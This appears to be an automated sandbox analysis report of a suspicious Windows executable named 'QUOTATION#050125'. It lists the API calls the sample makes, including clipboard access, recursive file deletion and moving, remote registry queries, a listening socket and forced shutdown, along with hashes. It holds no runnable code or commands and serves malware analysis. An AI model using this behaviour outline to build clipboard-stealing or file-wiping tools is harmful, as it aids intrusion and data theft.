                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00120D78
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00120D7F
                                                                                        • Part of subcall function 00121193: GetProcessHeap.KERNEL32(00000008,00120BB1,?,00000000,?,00120BB1,?), ref: 001211A1
                                                                                        • Part of subcall function 00121193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00120BB1,?), ref: 001211A8
                                                                                        • Part of subcall function 00121193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00120BB1,?), ref: 001211B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                      • String ID:
                                                                                      • API String ID: 4175595110-0
                                                                                      • Opcode ID: e32eff31de3325c9b337da8195d85bfafbac9e399e12f8f8e9c326a62cce97ee
                                                                                      • Instruction ID: 4c170a9acf8b738c55cc20a3bd803a9d51d08bcdd59c538f5d8ee7bb87b00b32
                                                                                      • Opcode Fuzzy Hash: e32eff31de3325c9b337da8195d85bfafbac9e399e12f8f8e9c326a62cce97ee
                                                                                      • Instruction Fuzzy Hash: ED716A7590131AEFDF11DFE4EC44BAEBBB8EF08311F044215F914AA292D771AA55CBA0
                                                                                      APIs
                                                                                      • OpenClipboard.USER32(0015CC08), ref: 0013EB29
                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0013EB37
                                                                                      • GetClipboardData.USER32(0000000D), ref: 0013EB43
                                                                                      • CloseClipboard.USER32 ref: 0013EB4F
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0013EB87
                                                                                      • CloseClipboard.USER32 ref: 0013EB91
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0013EBBC
                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0013EBC9
                                                                                      • GetClipboardData.USER32(00000001), ref: 0013EBD1
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0013EBE2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0013EC22
                                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 0013EC38
                                                                                      • GetClipboardData.USER32(0000000F), ref: 0013EC44
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0013EC55
                                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0013EC77
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0013EC94
                                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0013ECD2
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0013ECF3
                                                                                      • CountClipboardFormats.USER32 ref: 0013ED14
                                                                                      • CloseClipboard.USER32 ref: 0013ED59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                      • String ID:
                                                                                      • API String ID: 420908878-0
                                                                                      • Opcode ID: 20b53fc997128f997d98f04248fc179e4e04ddee1395c0a7ee1dac4b2776ecd8
                                                                                      • Instruction ID: 64c18a18df515a6f6d969ca9bba311ca4801362ac9f3bb187aacb7dff6a02174
                                                                                      • Opcode Fuzzy Hash: 20b53fc997128f997d98f04248fc179e4e04ddee1395c0a7ee1dac4b2776ecd8
                                                                                      • Instruction Fuzzy Hash: EB61AB34204301AFD310EF64D899F6AB7E4EF84714F14455DF4569B2E2CB71EA85CBA2
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 001369BE
                                                                                      • FindClose.KERNEL32(00000000), ref: 00136A12
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00136A4E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00136A75
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00136AB2
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00136ADF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                      • API String ID: 3232708057-3289030164
                                                                                      • Opcode ID: 61f4dde533c6329b2f8cf03d7b5a7faaa2705fe5aac4350190f344e0bb9cad0c
                                                                                      • Instruction ID: ae95291748b613a023416962041e84ca580752b6d6bfca8e34f67b561b9f8e14
                                                                                      • Opcode Fuzzy Hash: 61f4dde533c6329b2f8cf03d7b5a7faaa2705fe5aac4350190f344e0bb9cad0c
                                                                                      • Instruction Fuzzy Hash: 43D14171508340AFC714EBA4C886EAFB7ECAF88704F44491DF589D7192EB74DA49CB62
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,77098FB0,?,00000000), ref: 00139663
                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 001396A1
                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 001396BB
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 001396D3
                                                                                      • FindClose.KERNEL32(00000000), ref: 001396DE
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 001396FA
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0013974A
                                                                                      • SetCurrentDirectoryW.KERNEL32(00186B7C), ref: 00139768
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00139772
                                                                                      • FindClose.KERNEL32(00000000), ref: 0013977F
                                                                                      • FindClose.KERNEL32(00000000), ref: 0013978F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1409584000-438819550
                                                                                      • Opcode ID: 22cac37931d8a3bd398360795bb55ed5066e73643b7fbc3c96c03bd8f0185c52
                                                                                      • Instruction ID: ca328e2ce59952a3fe0ba1af424e2579a1362189401a65fd945e64ebeb9ef132
                                                                                      • Opcode Fuzzy Hash: 22cac37931d8a3bd398360795bb55ed5066e73643b7fbc3c96c03bd8f0185c52
                                                                                      • Instruction Fuzzy Hash: 1631F13264131AAFDF14AFB4DC49ADE77ACAF09322F144055F915E60E0EBB4DE848E90
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?,77098FB0,?,00000000), ref: 001397BE
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00139819
                                                                                      • FindClose.KERNEL32(00000000), ref: 00139824
                                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00139840
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00139890
                                                                                      • SetCurrentDirectoryW.KERNEL32(00186B7C), ref: 001398AE
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 001398B8
                                                                                      • FindClose.KERNEL32(00000000), ref: 001398C5
                                                                                      • FindClose.KERNEL32(00000000), ref: 001398D5
                                                                                        • Part of subcall function 0012DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0012DB00
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                      • String ID: *.*
                                                                                      • API String ID: 2640511053-438819550
                                                                                      • Opcode ID: 5eb7a3c5a5a6d2922a9190e7b573a9ce56da2599c7278b2dcfbfce378315a26a
                                                                                      • Instruction ID: c4c14ed6f4700d1a6af0bbb87d468a715dab0e2e164c30e89f66f9bf9a11c78f
                                                                                      • Opcode Fuzzy Hash: 5eb7a3c5a5a6d2922a9190e7b573a9ce56da2599c7278b2dcfbfce378315a26a
                                                                                      • Instruction Fuzzy Hash: 2D31D23250035EAEDF10EFB4EC48ADE77ACAF46325F1441A5E950A60A1DBB4DE84CF60
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014BF3E
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0014BFA9
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014BFCD
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0014C02C
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0014C0E7
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0014C154
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0014C1E9
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0014C23A
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0014C2E3
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0014C382
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014C38F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                      • String ID:
                                                                                      • API String ID: 3218304859-0
                                                                                      • Opcode ID: d3736f5c7416ec4c92c8cc46030760ec26485321a854dfb947a39c92195074b6
                                                                                      • Instruction ID: cd0f45c9572e17e7d7f7db2bce3539f81c6be2cbd2c99906dd394873f8886232
                                                                                      • Opcode Fuzzy Hash: d3736f5c7416ec4c92c8cc46030760ec26485321a854dfb947a39c92195074b6
                                                                                      • Instruction Fuzzy Hash: 2B023C716042009FD754DF28C895E2ABBE5EF89318F18C49DF84ACB2A2DB31ED45CB91
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00138257
                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00138267
                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00138273
                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00138310
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138324
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138356
                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0013838C
                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00138395
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1464919966-438819550
                                                                                      • Opcode ID: 695f708c618102c9fefa003003ea0e049d855c4aec3fb4e3b2f2206d6731c6a2
                                                                                      • Instruction ID: 85d21375b86c2f073419f34e2cc51610a4901858191ae54d321f1c4cf9de86ca
                                                                                      • Opcode Fuzzy Hash: 695f708c618102c9fefa003003ea0e049d855c4aec3fb4e3b2f2206d6731c6a2
                                                                                      • Instruction Fuzzy Hash: 226169725043459FCB10EF60C841EAEB3E8FF89314F04892EF98997252DB35E949CB92
                                                                                      APIs
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                        • Part of subcall function 0012E199: GetFileAttributesW.KERNEL32(?,0012CF95), ref: 0012E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0012D122
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0012D1DD
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0012D1F0
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0012D20D
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012D237
                                                                                        • Part of subcall function 0012D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0012D21C,?,?), ref: 0012D2B2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 0012D253
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012D264
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 1946585618-1173974218
                                                                                      • Opcode ID: bbbf4576fffee9214574e286668c6489c97154943882b7fb827da9a0479a63bb
                                                                                      • Instruction ID: 6f7c3366f8023294738cedc79e3bf108b9ddda3f654fbfb08451f2ee71fd5cbf
                                                                                      • Opcode Fuzzy Hash: bbbf4576fffee9214574e286668c6489c97154943882b7fb827da9a0479a63bb
                                                                                      • Instruction Fuzzy Hash: 6E615C3190125D9FCF05EBA0EA92EEDB7B5AF15300F608169E40277192EB30AF19CB61
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1737998785-0
                                                                                      • Opcode ID: 4088ad22b00fe0ec347332d481df1eb305824750531a8d29ae728ec434f22122
                                                                                      • Instruction ID: 45ddf7d4db2b3db4d5dd696e289fb0e351c12449a1f439e0f4ed8fc0e9369192
                                                                                      • Opcode Fuzzy Hash: 4088ad22b00fe0ec347332d481df1eb305824750531a8d29ae728ec434f22122
                                                                                      • Instruction Fuzzy Hash: 5A416A35604711EFE710DF15D888F5ABBE5EF44329F1480A9E4198FAA2C735ED82CB90
                                                                                      APIs
                                                                                        • Part of subcall function 001216C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0012170D
                                                                                        • Part of subcall function 001216C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0012173A
                                                                                        • Part of subcall function 001216C3: GetLastError.KERNEL32 ref: 0012174A
                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 0012E932
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                                      • API String ID: 2234035333-3163812486
                                                                                      • Opcode ID: 83d9d6c01d07755ec08e1bc4ca280104463bb34e2baf8417bb0ac3c54b601a94
                                                                                      • Instruction ID: a89eb6d170ddfca038460e8f77f5ec637d4abc1daa477d6aa957b370952dc7ff
                                                                                      • Opcode Fuzzy Hash: 83d9d6c01d07755ec08e1bc4ca280104463bb34e2baf8417bb0ac3c54b601a94
                                                                                      • Instruction Fuzzy Hash: 9801D672A10331AFEF5466B8BC8ABBF729CA724759F150423F902E61D1E7A05CE4C6D4
                                                                                      APIs
                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00141276
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141283
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 001412BA
                                                                                      • WSAGetLastError.WSOCK32 ref: 001412C5
                                                                                      • closesocket.WSOCK32(00000000), ref: 001412F4
                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00141303
                                                                                      • WSAGetLastError.WSOCK32 ref: 0014130D
                                                                                      • closesocket.WSOCK32(00000000), ref: 0014133C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                      • String ID:
                                                                                      • API String ID: 540024437-0
                                                                                      • Opcode ID: 0635fe02fc3b3cbfec56ee985ee150a4c2d7245d7782b03c3ca484fe120e073c
                                                                                      • Instruction ID: 328f79ed3a120bed43919b1aed8ea51e3b189a4dcc9f1ed55a3d42eb6d1d934c
                                                                                      • Opcode Fuzzy Hash: 0635fe02fc3b3cbfec56ee985ee150a4c2d7245d7782b03c3ca484fe120e073c
                                                                                      • Instruction Fuzzy Hash: 9D414E31600200AFD714DF64C485F69BBE6BF46318F288198E8569F2A6C771EDC2CBE1
                                                                                      APIs
                                                                                        • Part of subcall function 000C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C3A97,?,?,000C2E7F,?,?,?,00000000), ref: 000C3AC2
                                                                                        • Part of subcall function 0012E199: GetFileAttributesW.KERNEL32(?,0012CF95), ref: 0012E19A
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0012D420
                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 0012D470
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0012D481
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012D498
                                                                                      • FindClose.KERNEL32(00000000), ref: 0012D4A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 2649000838-1173974218
                                                                                      • Opcode ID: 63d7e7eb908fdd3a144bb270cda8effda88fe93675aed27695677bec5a321a60
                                                                                      • Instruction ID: ca41c5c4da0b3f02345ba387cd78b02c9f1eee507c027a6e337c0c728e175678
                                                                                      • Opcode Fuzzy Hash: 63d7e7eb908fdd3a144bb270cda8effda88fe93675aed27695677bec5a321a60
                                                                                      • Instruction Fuzzy Hash: 41316F310083959FC204EF64E855DEF77A8AF96314F444A1DF4D153192EB30AA19CB63
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 001422E8
                                                                                        • Part of subcall function 0013E4EC: GetWindowRect.USER32(?,?), ref: 0013E504
                                                                                      • GetDesktopWindow.USER32 ref: 00142312
                                                                                      • GetWindowRect.USER32(00000000), ref: 00142319
                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00142355
                                                                                      • GetCursorPos.USER32(?), ref: 00142381
                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001423DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                      • String ID:
                                                                                      • API String ID: 2387181109-0
                                                                                      • Opcode ID: 8bcbea19aaf3aa5cd6231f3c552353996514b9c512a5bc241ea563266d5c2cf2
                                                                                      • Instruction ID: 34249d109f7c249f7585bf60807f20b4b3efabb2c542f6a6f981bb03cbf00d97
                                                                                      • Opcode Fuzzy Hash: 8bcbea19aaf3aa5cd6231f3c552353996514b9c512a5bc241ea563266d5c2cf2
                                                                                      • Instruction Fuzzy Hash: B131DE72504315AFCB20DF54D849B9BBBE9FF88314F400A19F9859B191DB74EA88CBD2
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00139B78
                                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00139C8B
                                                                                        • Part of subcall function 00133874: GetInputState.USER32 ref: 001338CB
                                                                                        • Part of subcall function 00133874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00133966
                                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00139BA8
                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00139C75
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
